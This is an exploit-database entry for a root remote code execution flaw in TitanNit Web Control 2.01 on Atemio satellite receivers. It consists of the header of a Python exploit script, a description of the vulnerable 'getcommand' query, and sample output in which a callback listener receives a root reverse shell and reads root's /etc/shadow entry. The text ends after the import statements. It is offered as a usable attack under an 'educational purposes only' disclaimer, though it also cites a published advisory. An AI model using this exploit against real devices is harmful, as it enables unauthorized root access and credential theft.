Titannit web control 2.01 / atemio 7600 root remote code execution Vulnerability / Exploit
Exploits / Vulnerability Discovered : 2024-03-03 |
Type : remote |
Platform : hardware
This exploit / vulnerability Titannit web control 2.01 / atemio 7600 root remote code execution is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# TitanNit Web Control 2.01 / Atemio 7600 Root Remote Code Execution
# Vendor: AAF Digital HD Forum | Atelmo GmbH
# Product web page: http://www.aaf-digital.info | https://www.atemio.de
# Affected version: Firmware <=2.01
# Summary: The Atemio AM 520 HD Full HD satellite receiver enables the
# reception of digital satellite programs in overwhelming image quality
# in both SD and HD ranges. In addition to numerous connections, the small
# all-rounder offers a variety of plugins that can be easily installed
# thanks to the large flash memory. The TitanNit Linux software used combines
# the advantages of the existing E2 and Neutrino systems and is therefore
# fast, stable and adaptable.
# Desc: The vulnerability in the device enables an unauthorized attacker
# to execute system commands with elevated privileges. This exploit is
# facilitated through the use of the 'getcommand' query within the application,
# allowing the attacker to gain root access.
# ========================================================================
# _# python titannnit_rce.py 9999
# [*] Starting callback listener child thread
# [*] Listening on port 9999
# [*] Generating callback payload
# [*] Calling
# [*] Callback waiting: 3s
# [*] ('', 40943) called back
# [*] Rootshell session opened
# sh: cannot set terminal process group (1134): Inappropriate ioctl for device
# sh: no job control in this shell
# sh-5.1# id
# <-sh-5.1# id
# uid=0(root) gid=0(root)
# sh-5.1# cat /etc/shadow | grep root
# <-sh-5.1# cat /etc/shadow | grep root
# root:$6$TAdBGj2mY***:18729:0:99999:7:::
# sh-5.1# exit
# [*] OK, bye!
# _#
# =======================================================================
# Tested on: GNU/Linux (STMicroelectronics)
# GNU/Linux 3.14-1.17 (armv7l)
# GNU/Linux 3.14.2 (mips)
# ATEMIO M46506 revision 990
# Atemio 7600 HD STB
# CPU STx7105 Mboard
# titan web server
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
# Advisory ID: ZSL-2023-5801
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5801.php
# 16.11.2023
from time import sleep
import threading
import requests
import socket
import sys